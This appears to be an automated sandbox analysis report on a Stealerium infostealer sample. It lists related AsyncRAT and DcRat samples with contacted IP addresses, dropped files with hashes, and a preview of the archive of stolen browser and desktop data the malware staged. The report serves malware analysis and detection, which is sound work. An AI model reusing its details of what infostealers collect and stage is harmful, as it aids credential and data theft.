                                                                                                                                                            TXj1ICMUqd.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            cY6HT7CeBF.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            lka01EskGw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            ELsb0Wg55V.exeGet hashmaliciousDcRatBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            lka01EskGw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            No context
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.4772805785670338
Encrypted: false
SSDEEP: 384:iqp8i/9G0HgramNsTmlzzzuiFlY4lO8O:BpR9G0HgraTwzzzuiFlY4lO8
MD5: 4C4F47F4D450B9137B12F665FF9C66E3
SHA1: 6C2F8F2AE254ECF752A590268917E8CEDBE6DD78
SHA-256: 5E8C2F27D410D4561320D75AF5E9DECAD74CD35EDBB49EE20DE9F71278175B66
SHA-512: E45893310D3EF6087EBF887D42F0822F35CDEBC4CAB6C8D2B17357EF395CD6E16C86DE46C3EA411D9D7F34731BE30C7EB57A1594296F04601EFBC5E1719CBDDB
Malicious: true
Preview: Version=1..EventType=CLR20r3..EventTime=133773533201484760..ReportType=2..Consent=1..UploadTime=133773533215391049..ReportStatus=524384..ReportIdentifier=fd83eecf-6625-454f-a456-79f4ff32e4ec..IntegratorReportIdentifier=96231794-185a-4ea8-8c6a-bc6b89620f8a..Wow64Host=34404..NsAppName=K6aOw2Jmji.exe..OriginalFilename=stub.exe..AppSessionGuid=00001900-0001-0014-2ed6-87cd5142db01..TargetAppId=W:00060827c98c8c993e92137217d02ec5b39b00000000!000029725d1d174fb10d919a6f5b5f5ca2d2d83485af!K6aOw2Jmji.exe..
Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 16 streams, Fri Nov 29 11:28:40 2024, 0x1205a4 type
Category: dropped
Size (bytes): 798008
Entropy (8bit): 3.1384455581765422
Encrypted: false
SSDEEP: 6144:ZEi3HDG0c+4aalhq8rjVW3Q24YcRGoJNn/l6yIA:zx7UXqoWQ24YcRRJNn/cHA
MD5: 993F63079D8EE47ACB3F504F37CBB42B
SHA1: 38C5A040368AC1372145E397955A3ED5DE2782ED
SHA-256: 53267E9A2F374BFCF7D146D32CCBD3EBEF3F50F306614D70331355BB4236DB7D
SHA-512: 86E899485766A32BEAC91A029ACF9F397047D885A9E5741C8DF651472668D1A8067C0FB7363E6CCFC3B101B868A7667F164541A5723DFA1552A519E63DA0F4C9
Malicious: false
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 9098
Entropy (8bit): 3.7090067639745357
Encrypted: false
SSDEEP: 192:R6l7wVeJB0t6Y9Xt7TgmfZV8UyUprD89bq16fUKOm:R6lXJSt6Y9tPgmfgUy9qIfn
MD5: 104D9F969847529F7075BE2845A15BD0
SHA1: A0F14CE3F3BFB4E2BC8E80D68E1C7E9EB40AA8E5
SHA-256: 164E31C6EAE81F3410FA68322CD51717AB74A40A1CA80C1783914A7C3BE7E1F5
SHA-512: 6C2232F00FC17344CD6E9575C7D68AC06E1E63DDF52D9106B7A32A539D69F3019CD899C1AE503A789CA459F6A8B47380FB7F0413EAD7DBDCCBDE80FFFFA078E1
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6400</Pi
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4806
Entropy (8bit): 4.474576961472362
Encrypted: false
SSDEEP: 48:cvIwWl8zsDJg771I9H0WpW8VYcYm8M4JYEeEI8FOn5yq8vqEI6Yt5tBnd:uIjfdI7ot7VcJYEeEWWqEXYt5t9d
MD5: B40B3739295EE9A7461853D069E22560
SHA1: EF2470529748D585F059878BB5E1199B9C9CA3AE
SHA-256: 3DA9164F84A76366CC15E47A9C9E6AE288567720EBFB1F136C1A42B614898E92
SHA-512: A12031C11F01ACE5FF5B0C41B5DD4A8CE9DDBE6CB7CFD52738A31F322EF8128A06B4A21EDE716A9FFCDBB30329F2370B599A1D4D1EB69640AD8D549D26661C89
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="609271" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):106496
                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40960
                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):159744
                                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):159744
                                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):98304
                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):106496
                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114688
                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114688
                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):49152
                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):126976
                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):118556
                                                                                                                                                            Entropy (8bit):7.938417166414126
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:et9Zh1xOUIpSlWmDGr5R3vylhiMaDo/Ge58hb:i9ZhoDFCf/Gewb
                                                                                                                                                            MD5:86A8FFF9E112A5E959EB5B857321F3EE
                                                                                                                                                            SHA1:6B576ECE07E251E9875217710A10BE5AE8EB0662
                                                                                                                                                            SHA-256:CCA6DF87349C1EC691E7E8EBD5F530A33DD06B48F534EB0E629BF4E77AC4A925
                                                                                                                                                            SHA-512:BC9A94C06CEDF986BF98D48DA8DFABA692759F5DED5515A1830EFF9AE38BF99243D684FA72643E0CB7EED52926BF1CB0DFF1F228833808A4795F27A4B17CB4F1
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zip, Author: Joe Security
                                                                                                                                                            Preview:PK.........3}Y................Browsers/Edge/History.txtTCah-A..z:.PK.........3}Yq.C]t...........Browsers/Firefox/Bookmarks.txt..8}3.Z.........\.g.(.;1.b.....O.....-..%O.@U.?...9..-6.v....T..wA...<.61..d=..P..Y.s_..P0....#o...~z......?PK..q.C]t.......PK.........3}Y...sl...^.......Browsers/Firefox/History.txt.LJ..D..d8.x.@.....i....z;Y~..-......H^..g1..P.ls.P...UD..b.m...E.Lj....l.,.I.>.R....W.......1..`.Q..PK.....sl...^...PK.........3}Y................Browsers/Google/Downloads.txtUmf....Ys.YmPK.........3}Y................Browsers/Google/History.txt..^..p.s.vMPK.........3}Y.......5.......Directories/Desktop.txt...u(.n...iY..P.........{Z_..uk..+.Re"......N|.k.....Q..w..'. .<..y`<7..].q..lR-..6..*o.X..2l.^......oO.......G$.O..{..,....}..G.d........!...).e...[5.(..........CG..6...........t/M...........#.<.%.q......H.....NJ..-.lk.C..k..]x.....o..+..uE.....R.F.jPK.........5...PK.........3}YC.h.+...........Directories/Documents.txtR.&F....}....w...|.b.H`R..+..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):220
                                                                                                                                                            Entropy (8bit):4.546534105739819
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Kw5FBeKjMnf3eKj5ZKMeKjYLC/eKjtyRE2YReK3:KCBH4n/HHKMHsL0HMRE2uH3
                                                                                                                                                            MD5:2AB1FD921B6C195114E506007BA9FE05
                                                                                                                                                            SHA1:90033C6EE56461CA959482C9692CF6CFB6C5C6AF
                                                                                                                                                            SHA-256:C79CFDD6D0757EB52FBB021E7F0DA1A2A8F1DD81DCD3A4E62239778545A09ECC
                                                                                                                                                            SHA-512:4F0570D7C7762ECB4DCF3171AE67DA3C56AA044419695E5A05F318E550F1A910A616F5691B15ABFE831B654718EC97A534914BD172AA7A963609EBD8E1FAE0A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Title: Get Help.URL: (No URL provided)..Title: Customize Firefox.URL: (No URL provided)..Title: Get Involved.URL: (No URL provided)..Title: About Us.URL: (No URL provided)..Title: Getting Started.URL: (No URL provided)..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94
                                                                                                                                                            Entropy (8bit):4.890995272476094
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:qtNRROrSLvIJiMhKVX3L2WdXOfZiGPHA9lfMJJEv:MeGLciA8dXwZiG/CF0Ev
                                                                                                                                                            MD5:A72509876646BC379E1D8C3B895ED0ED
                                                                                                                                                            SHA1:2F270C6A8E07FA7FEE8C07A1FD100474A9A513A8
                                                                                                                                                            SHA-256:8BF712CABAC55E09FF74348817A29572826688AE4AB516848FE882BC5DEF91E7
                                                                                                                                                            SHA-512:FDCB7BB82C0AF434610311D7B12EB2D6AEF7ADB8B040EBA97D3F115C18810799EEDC02B39AF6992C15552568B5BC799889CC185191D5E783DEB82DC98946A5EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:URL: https://www.mozilla.org/en-US/privacy/firefox/.Title: Firefox Privacy Notice . Mozilla.
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):244
                                                                                                                                                            Entropy (8bit):5.087743120757909
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Uqf7R5WzLVMz3eYeDPO+YtnJXQcOG4E2WzLVMz3eYeDPOCd4:UO2zGjeDDPOtnKcOHPWzGjeDDPO7
                                                                                                                                                            MD5:4C0A246FFF442FDA266D22D0038B1D16
                                                                                                                                                            SHA1:9EC99F882E0D4B9B9305AADBA1875F88CF7A740D
                                                                                                                                                            SHA-256:44F3AB1DC0DC9397D7CE58C447533146360F68AFD3114D22AAE5056B10EC0E24
                                                                                                                                                            SHA-512:6E1C3DB12EBAA416448581C24D7FB1DD7F34BBD1FB40E8657B8A8FEBA9653E99BCD31B599DC7CA52E31C5560ECEA8E40B73C7E6DE1362AFF459E59F5B18B6D8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:URL: Examples of Office product keys - Microsoft Support.Title: https://go.microsoft.com/fwlink/?linkid=851546..URL: Install the English Language Pack for 32-bit Office - Microsoft Support.Title: https://go.microsoft.com/fwlink/?LinkId=2106243.
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):565
                                                                                                                                                            Entropy (8bit):5.246518597239024
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:wvZfWdjKtbb0OL4vsb7ZAEN1cyFJOLAsa6uLKP3BpPR0cqOC0/F5LfL4vssmay:N2Yk405Ac/JkdRPRpPR0TO9NVj40V
                                                                                                                                                            MD5:80134270D9C66F3D76355C8288037B86
                                                                                                                                                            SHA1:05378F1C52C3FF356F5593ACD0BD18618698D5CA
                                                                                                                                                            SHA-256:BC6E82F00CA57B3B30350E71CD704DC9D7843BDCE01F79400F2421EE7C0E9F4A
                                                                                                                                                            SHA-512:95A73DD4A97A96754F01B24C97274807502CA1DA25E2A2D5214E035A9249FC4E14F84B3B5CD1C41CB0AE741556FF2371244336C46266B26AB3CC9102EBFCA9F8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Desktop\...BPMLNOBVSB\...FENIVHOIKN\...NWTVCDUMOB\...UMMBDNEQBN\....HTAGVDFUIE.xlsx....KZWFNRXYKI.png....LTKMYBSEYZ.pdf....UMMBDNEQBN.docx....WUTJSCBCFX.jpg....ZBEDCJPBEY.mp3...VLZDGUKUTZ\....DVWHKMNFNN.png....HTAGVDFUIE.jpg....KATAXZVCPS.pdf....LTKMYBSEYZ.mp3....UMMBDNEQBN.xlsx....VLZDGUKUTZ.docx...WUTJSCBCFX\...desktop.ini...DVWHKMNFNN.png...Excel.lnk...HTAGVDFUIE.jpg...HTAGVDFUIE.xlsx...K6aOw2Jmji.exe...KATAXZVCPS.pdf...KZWFNRXYKI.png...LTKMYBSEYZ.mp3...LTKMYBSEYZ.pdf...UMMBDNEQBN.docx...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...WUTJSCBCFX.jpg...ZBEDCJPBEY.mp3..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):690
                                                                                                                                                            Entropy (8bit):5.337901229995342
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:afwPLKQ4wRLKTLKBLKMkLKBKdjKtbb0OL4vsb7ZAEN1cyFJOLAsa6uLKP3qcqw/F:8xrqEEBK2Yk405Ac/JkdRPaTwNVj40V
                                                                                                                                                            MD5:F6BD14272083AA27E237BDD44429EC9A
                                                                                                                                                            SHA1:E6545AEDA0C3C3C8C21C4362EFFF51741CFE2CF8
                                                                                                                                                            SHA-256:E1B39DA8CFC794F8D9F3CEDA654D45B5AEE3D565F0342B63F44604FF462AE8A1
                                                                                                                                                            SHA-512:9A5096299C6ED3538E27E39C9B52D3B81D0E6A904E7CA450301162DED55ED4FC8B8A1D448FF617F7EB5B000E35C40D22DFB7A5AA205D4B91F174D2DEFED9378B
                                                                                                                                                            Malicious:false
